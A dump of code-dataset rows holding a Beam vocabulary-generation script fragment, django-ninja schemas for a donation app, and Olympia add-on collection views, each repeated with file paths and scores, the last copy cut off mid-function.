utils.metrics_preprocessing_fn(FLAGS.vocab_file,
FLAGS.text_key,
FLAGS.language_code_key)))
# Initialize CSV coder. Aggregate values for each lang, calculate metrics,
# and write to output to a CSV file.
csv_converter = tft.coders.CsvCoder(columns, csv_schema)
_ = (
metrics_transformed_data
| 'CompileTokenInfo' >> beam.ParDo(utils.CompileTokenizationInfo())
| 'CombineStatsForLang' >> beam.CombineGlobally(utils.AggregateLang())
| 'CalculateMetrics' >> beam.ParDo(utils.CalculateMetrics())
| 'EncodeMetrics' >> beam.Map(csv_converter.encode)
| 'WriteMetrics' >> beam.io.WriteToText(
metrics_file, shard_name_template='', header=','.join(columns)))
return metrics_pipeline
vocab_pipeline = run_vocab()
vocab_pipeline.run().wait_until_finish()
metrics_pipeline = run_metrics()
metrics_pipeline.run().wait_until_finish()
def main(_):
# Define schema.
raw_metadata = dataset_metadata.DatasetMetadata(
dataset_schema.from_feature_spec({
'text': tf.FixedLenFeature([], tf.string),
'language_code': tf.FixedLenFeature([], tf.string),
}))
# Add in padding tokens.
reserved_tokens = FLAGS.reserved_tokens
if FLAGS.num_pad_tokens:
padded_tokens = ['<pad>']
padded_tokens += ['<pad%d>' % i for i in range(1, FLAGS.num_pad_tokens)]
reserved_tokens = padded_tokens + reserved_tokens
params = learner.Params(FLAGS.upper_thresh, FLAGS.lower_thresh,
FLAGS.num_iterations, FLAGS.max_input_tokens,
FLAGS.max_token_length, FLAGS.max_unique_chars,
FLAGS.vocab_size, FLAGS.slack_ratio,
FLAGS.include_joiner_token, FLAGS.joiner,
reserved_tokens)
generate_vocab(FLAGS.data_file, FLAGS.vocab_file, FLAGS.metrics_file,
raw_metadata, params)
if __name__ == '__main__':
app.run(main) | 0.887741 | 0.169234 |
import datetime
import typing
from datetime import date
from typing import List, Optional
from ninja import Field, Schema
from pydantic import EmailStr
from share import choices, states
class OrganizationSummary(Schema):
id: int
type: str
name: str
city: choices.Cities
class DonationCreation(Schema):
id: int
amount: int
excepted_delivery_date: Optional[datetime.date]
class DonationModification(Schema):
id: int = 0
name: states.EventEnum = Field(..., alias="event")
comment: str = ""
class Donation(Schema):
id: int
required_item: str = Field(..., alias="required_item_name")
amount: int
state: states.DonationStateEnum
created_at: datetime.datetime
modified_at: datetime.datetime
class RequiredItemBase(Schema):
name: str
amount: int
unit: choices.Units
ended_date: date
class RequiredItemCreation(RequiredItemBase):
pass
class RequiredItem(RequiredItemBase):
id: str
state: states.RequiredItemStateEnum
approved_amount: int
delivered_amount: int
donations: typing.List[Donation]
class GroupedRequiredItems(Schema):
organization: OrganizationSummary
items: List[RequiredItem] = []
class OrganizationBase(Schema):
name: str
type: choices.OrganizationTypes
type_other: str
city: choices.Cities
address: str
phone: str
office_hours: str
other_contact_method: choices.ContactMethods
other_contact: str
class Organization(OrganizationBase):
id: int
class OrganizationCreation(OrganizationBase):
username: str
password: str
confirmed_password: str
email: EmailStr
class DonatorBase(Schema):
phone: str
other_contact_method: choices.ContactMethods
other_contact: str
class DonatorCreation(DonatorBase):
email: EmailStr
class Donator(DonatorBase):
id: int
class SetDonationResult(Schema):
message: typing.Optional[str] = None
donation: typing.Optional[Donation] = None
class UserMe(Schema):
name: str
email: str = ""
phone: str = ""
other_contact_method: str = ""
other_contact: str = "" | share/schemas.py | import datetime
import typing
from datetime import date
from typing import List, Optional
from ninja import Field, Schema
from pydantic import EmailStr
from share import choices, states
class OrganizationSummary(Schema):
id: int
type: str
name: str
city: choices.Cities
class DonationCreation(Schema):
id: int
amount: int
excepted_delivery_date: Optional[datetime.date]
class DonationModification(Schema):
id: int = 0
name: states.EventEnum = Field(..., alias="event")
comment: str = ""
class Donation(Schema):
id: int
required_item: str = Field(..., alias="required_item_name")
amount: int
state: states.DonationStateEnum
created_at: datetime.datetime
modified_at: datetime.datetime
class RequiredItemBase(Schema):
name: str
amount: int
unit: choices.Units
ended_date: date
class RequiredItemCreation(RequiredItemBase):
pass
class RequiredItem(RequiredItemBase):
id: str
state: states.RequiredItemStateEnum
approved_amount: int
delivered_amount: int
donations: typing.List[Donation]
class GroupedRequiredItems(Schema):
organization: OrganizationSummary
items: List[RequiredItem] = []
class OrganizationBase(Schema):
name: str
type: choices.OrganizationTypes
type_other: str
city: choices.Cities
address: str
phone: str
office_hours: str
other_contact_method: choices.ContactMethods
other_contact: str
class Organization(OrganizationBase):
id: int
class OrganizationCreation(OrganizationBase):
username: str
password: str
confirmed_password: str
email: EmailStr
class DonatorBase(Schema):
phone: str
other_contact_method: choices.ContactMethods
other_contact: str
class DonatorCreation(DonatorBase):
email: EmailStr
class Donator(DonatorBase):
id: int
class SetDonationResult(Schema):
message: typing.Optional[str] = None
donation: typing.Optional[Donation] = None
class UserMe(Schema):
name: str
email: str = ""
phone: str = ""
other_contact_method: str = ""
other_contact: str = "" | 0.772058 | 0.229508 |
import functools
import hashlib
import os
from django import http
from django.core.cache import cache
from django.core.exceptions import PermissionDenied
from django.db.models import Q
from django.db.transaction import non_atomic_requests
from django.shortcuts import get_object_or_404, redirect
from django.views.decorators.http import require_POST
from django.views.decorators.csrf import csrf_protect
from django.utils.translation import ugettext_lazy as _lazy, ugettext as _
import caching.base as caching
import commonware.log
from django_statsd.clients import statsd
from olympia import amo
from olympia.amo import messages
from olympia.amo.decorators import (
allow_mine, json_view, login_required, post_required, restricted_content,
write)
from olympia.amo.urlresolvers import reverse
from olympia.amo.utils import paginate, urlparams, render
from olympia.access import acl
from olympia.accounts.utils import redirect_for_login
from olympia.addons.models import Addon
from olympia.addons.views import BaseFilter
from olympia.legacy_api.utils import addon_to_dict
from olympia.tags.models import Tag
from olympia.translations.query import order_by_translation
from olympia.users.models import UserProfile
from .models import (
Collection, CollectionAddon, CollectionWatcher, CollectionVote,
SPECIAL_SLUGS)
from . import forms, tasks
log = commonware.log.getLogger('z.collections')
@non_atomic_requests
def get_collection(request, username, slug):
if (slug in SPECIAL_SLUGS.values() and request.user.is_authenticated() and
request.user.username == username):
return getattr(request.user, slug + '_collection')()
else:
return get_object_or_404(Collection.objects,
author__username=username, slug=slug)
def owner_required(f=None, require_owner=True):
"""Requires collection to be owned, by someone."""
def decorator(func):
@functools.wraps(func)
def wrapper(request, username, slug, *args, **kw):
collection = get_collection(request, username, slug)
if acl.check_collection_ownership(request, collection,
require_owner=require_owner):
return func(request, collection, username, slug, *args, **kw)
else:
raise PermissionDenied
return wrapper
return decorator(f) if f else decorator
@non_atomic_requests
def legacy_redirect(request, uuid, edit=False):
# Nicknames have a limit of 30, so len == 36 implies a uuid.
key = 'uuid' if len(uuid) == 36 else 'nickname'
c = get_object_or_404(Collection.objects, **{key: uuid})
if edit:
return http.HttpResponseRedirect(c.edit_url())
to = c.get_url_path() + '?' + request.GET.urlencode()
return http.HttpResponseRedirect(to)
@non_atomic_requests
def legacy_directory_redirects(request, page):
sorts = {'editors_picks': 'featured', 'popular': 'popular',
'users': 'followers'}
loc = base = reverse('collections.list')
if page in sorts:
loc = urlparams(base, sort=sorts[page])
elif request.user.is_authenticated():
if page == 'mine':
loc = reverse('collections.user', args=[request.user.username])
elif page == 'favorites':
loc = reverse('collections.following')
return http.HttpResponseRedirect(loc)
class CollectionFilter(BaseFilter):
opts = (('featured', _lazy(u'Featured')),
('followers', _lazy(u'Most Followers')),
('created', _lazy(u'Newest')))
extras = (('name', _lazy(u'Name')),
('updated', _lazy(u'Recently Updated')),
('popular', _lazy(u'Recently Popular')))
def filter_featured(self):
return self.base_queryset.filter(type=amo.COLLECTION_FEATURED)
def filter_followers(self):
return self.base_queryset.order_by('-subscribers')
def filter_popular(self):
return self.base_queryset.order_by('-weekly_subscribers')
def filter_updated(self):
return self.base_queryset.order_by('-modified')
def filter_created(self):
return self.base_queryset.order_by('-created')
def filter_name(self):
return order_by_translation(self.base_queryset, 'name')
def get_filter(request, base=None):
if base is None:
base = Collection.objects.listed()
base = (base.filter(Q(application=request.APP.id) | Q(application=None))
.exclude(addon_count=0))
return CollectionFilter(request, base, key='sort', default='featured')
@non_atomic_requests
def render_cat(request, template, data=None, extra=None):
if extra is None:
extra = {}
if data is None:
data = {}
data.update(dict(search_cat='collections'))
return render(request, template, data, **extra)
# TODO (potch): restore this when we do mobile bandwagon
# @mobile_template('bandwagon/{mobile/}collection_listing.html')
@non_atomic_requests
def collection_listing(request, base=None):
sort = request.GET.get('sort')
# We turn users into followers.
if sort == 'users':
return redirect(urlparams(reverse('collections.list'),
sort='followers'), permanent=True)
filter = get_filter(request, base)
# Counts are hard to cache automatically, and accuracy for this
# one is less important. Remember it for 5 minutes.
countkey = hashlib.md5(str(filter.qs.query) + '_count').hexdigest()
count = cache.get(countkey)
if count is None:
count = filter.qs.count()
cache.set(countkey, count, 300)
collections = paginate(request, filter.qs, count=count)
return render_cat(request, 'bandwagon/impala/collection_listing.html',
dict(collections=collections, src='co-hc-sidebar',
dl_src='co-dp-sidebar', filter=filter, sort=sort,
sorting=filter.field))
def get_votes(request, collections):
if not request.user.is_authenticated():
return {}
q = CollectionVote.objects.filter(
user=request.user, collection__in=[c.id for c in collections])
return dict((v.collection_id, v) for v in q)
@allow_mine
@non_atomic_requests
def user_listing(request, username):
author = get_object_or_404(UserProfile, username=username)
qs = (Collection.objects.filter(author__username=username)
.order_by('-created'))
mine = (request.user.is_authenticated() and
request.user.username == username)
if mine:
page = 'mine'
else:
page = 'user'
qs = qs.filter(listed=True)
collections = paginate(request, qs)
votes = get_votes(request, collections.object_list)
return render_cat(request, 'bandwagon/user_listing.html',
dict(collections=collections, collection_votes=votes,
page=page, author=author,
filter=get_filter(request)))
class CollectionAddonFilter(BaseFilter):
opts = (('added', _lazy(u'Added')),
('popular', _lazy(u'Popularity')),
('name', _lazy(u'Name')))
def filter_added(self):
return self.base_queryset.order_by('collectionaddon__created')
def filter_name(self):
return order_by_translation(self.base_queryset, 'name')
def filter_popular(self):
return self.base_queryset.order_by('-weekly_downloads')
@allow_mine
@non_atomic_requests
def collection_detail(request, username, slug):
c = get_collection(request, username, slug)
if not c.listed:
if not request.user.is_authenticated():
return redirect_for_login(request)
if not acl.check_collection_ownership(request, c):
raise PermissionDenied
if request.GET.get('format') == 'rss':
return http.HttpResponsePermanentRedirect(c.feed_url())
base = Addon.objects.valid() & c.addons.all()
filter = CollectionAddonFilter(request, base,
key='sort', default='popular')
notes = get_notes(c)
# Go directly to CollectionAddon for the count to avoid joins.
count = CollectionAddon.objects.filter(
Addon.objects.valid_q(amo.VALID_ADDON_STATUSES, prefix='addon__'),
collection=c.id)
addons = paginate(request, filter.qs, per_page=15, count=count.count())
# The add-on query is not related to the collection, so we need to manually
# hook them up for invalidation. Bonus: count invalidation.
keys = [addons.object_list.flush_key(), count.flush_key()]
caching.invalidator.add_to_flush_list({c.flush_key(): keys})
if c.author_id:
qs = Collection.objects.listed().filter(author=c.author)
others = amo.utils.randslice(qs, limit=4, exclude=c.id)
else:
others = []
# `perms` is defined in django.contrib.auth.context_processors. Gotcha!
user_perms = {
'view_stats': acl.check_ownership(request, c, require_owner=False),
}
tags = Tag.objects.filter(id__in=c.top_tags) if c.top_tags else []
return render_cat(request, 'bandwagon/collection_detail.html',
{'collection': c, 'filter': filter, 'addons': addons,
'notes': notes, 'author_collections': others,
'tags': tags, 'user_perms': user_perms})
@json_view(has_trans=True)
@allow_mine
@non_atomic_requests
def collection_detail_json(request, username, slug):
c = get_collection(request, username, slug)
if not (c.listed or acl.check_collection_ownership(request, c)):
raise PermissionDenied
# We evaluate the QuerySet with `list` to work around bug 866454.
addons_dict = [addon_to_dict(a) for a in list(c.addons.valid())]
return {
'name': c.name,
'url': c.get_abs_url(),
'iconUrl': c.icon_url,
'addons': addons_dict
}
def get_notes(collection, raw=False):
# This might hurt in a big collection with lots of notes.
# It's a generator so we don't evaluate anything by default.
notes = CollectionAddon.objects.filter(collection=collection,
comments__isnull=False)
rv = {}
for note in notes:
# Watch out for comments in a language we didn't pick up.
if note.comments:
rv[note.addon_id] = (note.comments.localized_string if raw
else note.comments)
yield rv
@write
@login_required
def collection_vote(request, username, slug, direction):
c = get_collection(request, username, slug)
if request.method != 'POST':
return http.HttpResponseRedirect(c.get_url_path())
vote = {'up': 1, 'down': -1}[direction]
qs = (CollectionVote.objects.using('default')
.filter(collection=c, user=request.user))
if qs:
cv = qs[0]
if vote == cv.vote: # Double vote => cancel.
cv.delete()
else:
cv.vote = vote
cv.save(force_update=True)
else:
CollectionVote.objects.create(collection=c, user=request.user,
vote=vote)
if request.is_ajax():
return http.HttpResponse()
else:
return http.HttpResponseRedirect(c.get_url_path())
def initial_data_from_request(request):
return dict(author=request.user, application=request.APP.id)
def collection_message(request, collection, option):
if option == 'add':
title = _('Collection created!')
msg = _(
'Your new collection is shown below. You can '
'<a href="%(url)s">edit additional settings</a> if you\'d '
'like.'
) % {'url': collection.edit_url()}
elif option == 'update':
title = _('Collection updated!')
msg = _(
'<a href="%(url)s">View your collection</a> to see the changes.'
) % {'url': collection.get_url_path()}
else:
raise ValueError('Incorrect option "%s", '
'takes only "add" or "update".' % option)
messages.success(request, title, msg, message_safe=True)
@write
@login_required
@restricted_content
def add(request):
"""Displays/processes a form to create a collection."""
data = {}
if request.method == 'POST':
form = forms.CollectionForm(
request.POST, request.FILES,
initial=initial_data_from_request(request))
aform = forms.AddonsForm(request.POST)
if form.is_valid():
collection = form.save(default_locale=request.LANG)
collection.save()
if aform.is_valid():
aform.save(collection)
collection_message(request, collection, 'add')
statsd.incr('collections.created')
log.info('Created collection %s' % collection.id)
return http.HttpResponseRedirect(collection.get_url_path())
else:
data['addons'] = Addon.objects.filter(pk__in=aform.clean_addon())
data['comments'] = aform.clean_addon_comment()
else:
form = forms.CollectionForm()
data.update(form=form, filter=get_filter(request))
return render_cat(request, 'bandwagon/add.html', data)
@write
@login_required(redirect=False)
def ajax_new(request):
form = forms.CollectionForm(
request.POST or None,
initial={'author': request.user, 'application': request.APP.id},
)
if request.method == 'POST' and form.is_valid():
collection = form.save()
addon_id = request.REQUEST['addon_id']
collection.add_addon(Addon.objects.get(pk=addon_id))
log.info('Created collection %s' % collection.id)
return http.HttpResponseRedirect(reverse('collections.ajax_list') +
'?addon_id=%s' % addon_id)
return render(request, 'bandwagon/ajax_new.html', {'form': form})
@login_required(redirect=False)
@non_atomic_requests
def ajax_list(request):
try:
addon_id = int(request.GET['addon_id'])
except (KeyError, ValueError):
return http.HttpResponseBadRequest()
collections = (
Collection.objects
.publishable_by(request.user)
.with_has_addon(addon_id))
return render(request, 'bandwagon/ajax_list.html',
{'collections': collections})
@write
@login_required
@post_required
def collection_alter(request, username, slug, action):
c = get_collection(request, username, slug)
return change_addon(request, c, action)
def change_addon(request, collection, action):
if not acl.check_collection_ownership(request, collection):
raise PermissionDenied
try:
addon = get_object_or_404(Addon.objects, pk=request.POST['addon_id'])
except (ValueError, KeyError):
return http.HttpResponseBadRequest()
getattr(collection, action + '_addon')(addon)
log.info(u'%s: %s %s to collection %s' %
(request.user, action, addon.id, collection.id))
if request.is_ajax():
url = '%s?addon_id=%s' % (reverse('collections.ajax_list'), addon.id)
else:
url = collection.get_url_path()
return http.HttpResponseRedirect(url)
@write
@login_required
@post_required
def ajax_collection_alter(request, action):
try:
c = get_object_or_404(Collection.objects, pk=request.POST['id'])
except (ValueError, KeyError):
return http.HttpResponseBadRequest()
return change_addon(request, c, action)
@write
@login_required
# Contributors are allowed to *see* the page, but there is another
# permission check below to prevent them from doing any modifications.
@owner_required(require_owner=False)
def edit(request, collection, username, slug):
is_admin = acl.action_allowed(request, 'Collections', 'Edit')
if not acl.check_collection_ownership(
request, collection, require_owner=True):
if request.method == 'POST':
raise PermissionDenied
form = None
elif request.method == 'POST':
initial = initial_data_from_request(request)
if collection.author_id: # Don't try to change the author.
initial['author'] = collection.author
form = forms.CollectionForm(request.POST, request.FILES,
initial=initial,
instance=collection)
if form.is_valid():
collection = form.save()
collection_message(request, collection, 'update')
log.info(u'%s edited collection %s' %
(request.user, collection.id))
return http.HttpResponseRedirect(collection.edit_url())
else:
form = forms.CollectionForm(instance=collection)
qs = (CollectionAddon.objects.no_cache().using('default')
.filter(collection=collection))
meta = dict((c.addon_id, c) for c in qs)
addons = collection.addons.no_cache().all()
comments = get_notes(collection, raw=True).next()
if is_admin:
initial = dict(type=collection.type,
application=collection.application)
admin_form = forms.AdminForm(initial=initial)
else:
admin_form = None
data = dict(collection=collection,
form=form,
username=username,
slug=slug,
meta=meta,
filter=get_filter(request),
is_admin=is_admin,
admin_form=admin_form,
addons=addons,
comments=comments)
return render_cat(request, 'bandwagon/edit.html', data)
@write
@login_required
@owner_required(require_owner=False)
@post_required
def edit_addons(request, collection, username, slug):
if request.method == 'POST':
form = forms.AddonsForm(request.POST)
if form.is_valid():
form.save(collection)
collection_message(request, collection, 'update')
log.info(u'%s added add-ons to %s' %
(request.user, collection.id))
return http.HttpResponseRedirect(collection.edit_url() + '#addons-edit')
@write
@login_required
@owner_required
@post_required
def edit_contributors(request, collection, username, slug):
is_admin = acl.action_allowed(request, 'Collections', 'Edit')
if is_admin:
admin_form = forms.AdminForm(request.POST)
if admin_form.is_valid():
admin_form.save(collection)
form = forms.ContributorsForm(request.POST)
if form.is_valid():
form.save(collection)
collection_message(request, collection, 'update')
if form.cleaned_data['new_owner']:
return http.HttpResponseRedirect(collection.get_url_path())
return http.HttpResponseRedirect(collection.edit_url() + '#users-edit')
@write
@login_required
@owner_required
@post_required
def edit_privacy(request, collection, username, slug):
collection.listed = not collection.listed
collection.save()
log.info(u'%s changed privacy on collection %s' %
(request.user, collection.id))
return http.HttpResponseRedirect(collection.get_url_path())
@write
@login_required
def delete(request, username, slug):
collection = get_object_or_404(Collection, author__username=username,
slug=slug)
if not acl.check_collection_ownership(request, collection, True):
log.info(u'%s is trying to delete collection %s'
% (request.user, collection.id))
raise PermissionDenied
data = dict(collection=collection, username=username, slug=slug)
if request.method == 'POST':
if request.POST['sure'] == '1':
collection.delete()
log.info(u'%s deleted collection %s' %
(request.user, collection.id))
url = reverse('collections.user', args=[username])
return http.HttpResponseRedirect(url)
else:
return http.HttpResponseRedirect(collection.get_url_path())
return render_cat(request, 'bandwagon/delete.html', data)
@require_POST
@write
@login_required
@owner_required
@json_view
@csrf_protect
def delete_icon(request, collection, username, slug):
log.debug(u"User deleted collection (%s) icon " % slug)
tasks.delete_icon(os.path.join(collection.get_img_dir(),
'%d.png' % collection.id))
collection.icontype = ''
collection.save()
if request.is_ajax():
return {'icon': collection.icon_url}
else:
messages.success(request, _('Icon Deleted'))
return http.HttpResponseRedirect(collection.edit_url())
@login_required
@post_required
@json_view
def watch(request, username, slug):
"""
POST /collections/:user/:slug/watch to toggle the user's watching status.
For ajax, return {watching: true|false}. (reflects the new value)
Otherwise, redirect to the collection page.
"""
collection = get_collection(request, username, slug)
d = dict(user=request.user, collection=collection)
qs = CollectionWatcher.objects.no_cache().using('default').filter(**d)
watching = not qs # Flip the bool since we're about to change it.
if qs:
qs.delete()
else:
CollectionWatcher.objects.create(**d)
if request.is_ajax():
return {'watching': watching}
else:
return http.HttpResponseRedirect(collection.get_url_path())
@login_required
@non_atomic_requests
def following(request):
qs = (Collection.objects.filter(following__user=request.user)
.order_by('-following__created'))
collections = paginate(request, qs)
votes = get_votes(request, collections.object_list)
return render_cat(request, 'bandwagon/user_listing.html',
dict(collections=collections, votes=votes,
page='following', filter=get_filter(request)))
@login_required
@allow_mine
@non_atomic_requests
def mine(request, username=None, slug=None):
if slug is None:
return user_listing(request, username)
else:
return collection_detail(request, username, slug) | src/olympia/bandwagon/views.py | import functools
import hashlib
import os
from django import http
from django.core.cache import cache
from django.core.exceptions import PermissionDenied
from django.db.models import Q
from django.db.transaction import non_atomic_requests
from django.shortcuts import get_object_or_404, redirect
from django.views.decorators.http import require_POST
from django.views.decorators.csrf import csrf_protect
from django.utils.translation import ugettext_lazy as _lazy, ugettext as _
import caching.base as caching
import commonware.log
from django_statsd.clients import statsd
from olympia import amo
from olympia.amo import messages
from olympia.amo.decorators import (
allow_mine, json_view, login_required, post_required, restricted_content,
write)
from olympia.amo.urlresolvers import reverse
from olympia.amo.utils import paginate, urlparams, render
from olympia.access import acl
from olympia.accounts.utils import redirect_for_login
from olympia.addons.models import Addon
from olympia.addons.views import BaseFilter
from olympia.legacy_api.utils import addon_to_dict
from olympia.tags.models import Tag
from olympia.translations.query import order_by_translation
from olympia.users.models import UserProfile
from .models import (
Collection, CollectionAddon, CollectionWatcher, CollectionVote,
SPECIAL_SLUGS)
from . import forms, tasks
log = commonware.log.getLogger('z.collections')
@non_atomic_requests
def get_collection(request, username, slug):
if (slug in SPECIAL_SLUGS.values() and request.user.is_authenticated() and
request.user.username == username):
return getattr(request.user, slug + '_collection')()
else:
return get_object_or_404(Collection.objects,
author__username=username, slug=slug)
def owner_required(f=None, require_owner=True):
"""Requires collection to be owned, by someone."""
def decorator(func):
@functools.wraps(func)
def wrapper(request, username, slug, *args, **kw):
collection = get_collection(request, username, slug)
if acl.check_collection_ownership(request, collection,
require_owner=require_owner):
return func(request, collection, username, slug, *args, **kw)
else:
raise PermissionDenied
return wrapper
return decorator(f) if f else decorator
@non_atomic_requests
def legacy_redirect(request, uuid, edit=False):
# Nicknames have a limit of 30, so len == 36 implies a uuid.
key = 'uuid' if len(uuid) == 36 else 'nickname'
c = get_object_or_404(Collection.objects, **{key: uuid})
if edit:
return http.HttpResponseRedirect(c.edit_url())
to = c.get_url_path() + '?' + request.GET.urlencode()
return http.HttpResponseRedirect(to)
@non_atomic_requests
def legacy_directory_redirects(request, page):
sorts = {'editors_picks': 'featured', 'popular': 'popular',
'users': 'followers'}
loc = base = reverse('collections.list')
if page in sorts:
loc = urlparams(base, sort=sorts[page])
elif request.user.is_authenticated():
if page == 'mine':
loc = reverse('collections.user', args=[request.user.username])
elif page == 'favorites':
loc = reverse('collections.following')
return http.HttpResponseRedirect(loc)
class CollectionFilter(BaseFilter):
opts = (('featured', _lazy(u'Featured')),
('followers', _lazy(u'Most Followers')),
('created', _lazy(u'Newest')))
extras = (('name', _lazy(u'Name')),
('updated', _lazy(u'Recently Updated')),
('popular', _lazy(u'Recently Popular')))
def filter_featured(self):
return self.base_queryset.filter(type=amo.COLLECTION_FEATURED)
def filter_followers(self):
return self.base_queryset.order_by('-subscribers')
def filter_popular(self):
return self.base_queryset.order_by('-weekly_subscribers')
def filter_updated(self):
return self.base_queryset.order_by('-modified')
def filter_created(self):
return self.base_queryset.order_by('-created')
def filter_name(self):
return order_by_translation(self.base_queryset, 'name')
def get_filter(request, base=None):
if base is None:
base = Collection.objects.listed()
base = (base.filter(Q(application=request.APP.id) | Q(application=None))
.exclude(addon_count=0))
return CollectionFilter(request, base, key='sort', default='featured')
@non_atomic_requests
def render_cat(request, template, data=None, extra=None):
if extra is None:
extra = {}
if data is None:
data = {}
data.update(dict(search_cat='collections'))
return render(request, template, data, **extra)
# TODO (potch): restore this when we do mobile bandwagon
# @mobile_template('bandwagon/{mobile/}collection_listing.html')
@non_atomic_requests
def collection_listing(request, base=None):
sort = request.GET.get('sort')
# We turn users into followers.
if sort == 'users':
return redirect(urlparams(reverse('collections.list'),
sort='followers'), permanent=True)
filter = get_filter(request, base)
# Counts are hard to cache automatically, and accuracy for this
# one is less important. Remember it for 5 minutes.
countkey = hashlib.md5(str(filter.qs.query) + '_count').hexdigest()
count = cache.get(countkey)
if count is None:
count = filter.qs.count()
cache.set(countkey, count, 300)
collections = paginate(request, filter.qs, count=count)
return render_cat(request, 'bandwagon/impala/collection_listing.html',
dict(collections=collections, src='co-hc-sidebar',
dl_src='co-dp-sidebar', filter=filter, sort=sort,
sorting=filter.field))
def get_votes(request, collections):
if not request.user.is_authenticated():
return {}
q = CollectionVote.objects.filter(
user=request.user, collection__in=[c.id for c in collections])
return dict((v.collection_id, v) for v in q)
@allow_mine
@non_atomic_requests
def user_listing(request, username):
author = get_object_or_404(UserProfile, username=username)
qs = (Collection.objects.filter(author__username=username)
.order_by('-created'))
mine = (request.user.is_authenticated() and
request.user.username == username)
if mine:
page = 'mine'
else:
page = 'user'
qs = qs.filter(listed=True)
collections = paginate(request, qs)
votes = get_votes(request, collections.object_list)
return render_cat(request, 'bandwagon/user_listing.html',
dict(collections=collections, collection_votes=votes,
page=page, author=author,
filter=get_filter(request)))
class CollectionAddonFilter(BaseFilter):
opts = (('added', _lazy(u'Added')),
('popular', _lazy(u'Popularity')),
('name', _lazy(u'Name')))
def filter_added(self):
return self.base_queryset.order_by('collectionaddon__created')
def filter_name(self):
return order_by_translation(self.base_queryset, 'name')
def filter_popular(self):
return self.base_queryset.order_by('-weekly_downloads')
@allow_mine
@non_atomic_requests
def collection_detail(request, username, slug):
c = get_collection(request, username, slug)
if not c.listed:
if not request.user.is_authenticated():
return redirect_for_login(request)
if not acl.check_collection_ownership(request, c):
raise PermissionDenied
if request.GET.get('format') == 'rss':
return http.HttpResponsePermanentRedirect(c.feed_url())
base = Addon.objects.valid() & c.addons.all()
filter = CollectionAddonFilter(request, base,
key='sort', default='popular')
notes = get_notes(c)
# Go directly to CollectionAddon for the count to avoid joins.
count = CollectionAddon.objects.filter(
Addon.objects.valid_q(amo.VALID_ADDON_STATUSES, prefix='addon__'),
collection=c.id)
addons = paginate(request, filter.qs, per_page=15, count=count.count())
# The add-on query is not related to the collection, so we need to manually
# hook them up for invalidation. Bonus: count invalidation.
keys = [addons.object_list.flush_key(), count.flush_key()]
caching.invalidator.add_to_flush_list({c.flush_key(): keys})
if c.author_id:
qs = Collection.objects.listed().filter(author=c.author)
others = amo.utils.randslice(qs, limit=4, exclude=c.id)
else:
others = []
# `perms` is defined in django.contrib.auth.context_processors. Gotcha!
user_perms = {
'view_stats': acl.check_ownership(request, c, require_owner=False),
}
tags = Tag.objects.filter(id__in=c.top_tags) if c.top_tags else []
return render_cat(request, 'bandwagon/collection_detail.html',
{'collection': c, 'filter': filter, 'addons': addons,
'notes': notes, 'author_collections': others,
'tags': tags, 'user_perms': user_perms})
@json_view(has_trans=True)
@allow_mine
@non_atomic_requests
def collection_detail_json(request, username, slug):
c = get_collection(request, username, slug)
if not (c.listed or acl.check_collection_ownership(request, c)):
raise PermissionDenied
# We evaluate the QuerySet with `list` to work around bug 866454.
addons_dict = [addon_to_dict(a) for a in list(c.addons.valid())]
return {
'name': c.name,
'url': c.get_abs_url(),
'iconUrl': c.icon_url,
'addons': addons_dict
}
def get_notes(collection, raw=False):
# This might hurt in a big collection with lots of notes.
# It's a generator so we don't evaluate anything by default.
notes = CollectionAddon.objects.filter(collection=collection,
comments__isnull=False)
rv = {}
for note in notes:
# Watch out for comments in a language we didn't pick up.
if note.comments:
rv[note.addon_id] = (note.comments.localized_string if raw
else note.comments)
yield rv
@write
@login_required
def collection_vote(request, username, slug, direction):
c = get_collection(request, username, slug)
if request.method != 'POST':
return http.HttpResponseRedirect(c.get_url_path())
vote = {'up': 1, 'down': -1}[direction]
qs = (CollectionVote.objects.using('default')
.filter(collection=c, user=request.user))
if qs:
cv = qs[0]
if vote == cv.vote: # Double vote => cancel.
cv.delete()
else:
cv.vote = vote
cv.save(force_update=True)
else:
CollectionVote.objects.create(collection=c, user=request.user,
vote=vote)
if request.is_ajax():
return http.HttpResponse()
else:
return http.HttpResponseRedirect(c.get_url_path())
def initial_data_from_request(request):
return dict(author=request.user, application=request.APP.id)
def collection_message(request, collection, option):
if option == 'add':
title = _('Collection created!')
msg = _(
'Your new collection is shown below. You can '
'<a href="%(url)s">edit additional settings</a> if you\'d '
'like.'
) % {'url': collection.edit_url()}
elif option == 'update':
title = _('Collection updated!')
msg = _(
'<a href="%(url)s">View your collection</a> to see the changes.'
) % {'url': collection.get_url_path()}
else:
raise ValueError('Incorrect option "%s", '
'takes only "add" or "update".' % option)
messages.success(request, title, msg, message_safe=True)
@write
@login_required
@restricted_content
def add(request):
"""Displays/processes a form to create a collection."""
data = {}
if request.method == 'POST':
form = forms.CollectionForm(
request.POST, request.FILES,
initial=initial_data_from_request(request))
aform = forms.AddonsForm(request.POST)
if form.is_valid():
collection = form.save(default_locale=request.LANG)
collection.save()
if aform.is_valid():
aform.save(collection)
collection_message(request, collection, 'add')
statsd.incr('collections.created')
log.info('Created collection %s' % collection.id)
return http.HttpResponseRedirect(collection.get_url_path())
else:
data['addons'] = Addon.objects.filter(pk__in=aform.clean_addon())
data['comments'] = aform.clean_addon_comment()
else:
form = forms.CollectionForm()
data.update(form=form, filter=get_filter(request))
return render_cat(request, 'bandwagon/add.html', data)
@write
@login_required(redirect=False)
def ajax_new(request):
form = forms.CollectionForm(
request.POST or None,
initial={'author': request.user, 'application': request.APP.id},
)
if request.method == 'POST' and form.is_valid():
collection = form.save()
addon_id = request.REQUEST['addon_id']
collection.add_addon(Addon.objects.get(pk=addon_id))
log.info('Created collection %s' % collection.id)
return http.HttpResponseRedirect(reverse('collections.ajax_list') +
'?addon_id=%s' % addon_id)
return render(request, 'bandwagon/ajax_new.html', {'form': form})
@login_required(redirect=False)
@non_atomic_requests
def ajax_list(request):
try:
addon_id = int(request.GET['addon_id'])
except (KeyError, ValueError):
return http.HttpResponseBadRequest()
collections = (
Collection.objects
.publishable_by(request.user)
.with_has_addon(addon_id))
return render(request, 'bandwagon/ajax_list.html',
{'collections': collections})
@write
@login_required
@post_required
def collection_alter(request, username, slug, action):
c = get_collection(request, username, slug)
return change_addon(request, c, action)
def change_addon(request, collection, action):
if not acl.check_collection_ownership(request, collection):
raise PermissionDenied
try:
addon = get_object_or_404(Addon.objects, pk=request.POST['addon_id'])
except (ValueError, KeyError):
return http.HttpResponseBadRequest()
getattr(collection, action + '_addon')(addon)
log.info(u'%s: %s %s to collection %s' %
(request.user, action, addon.id, collection.id))
if request.is_ajax():
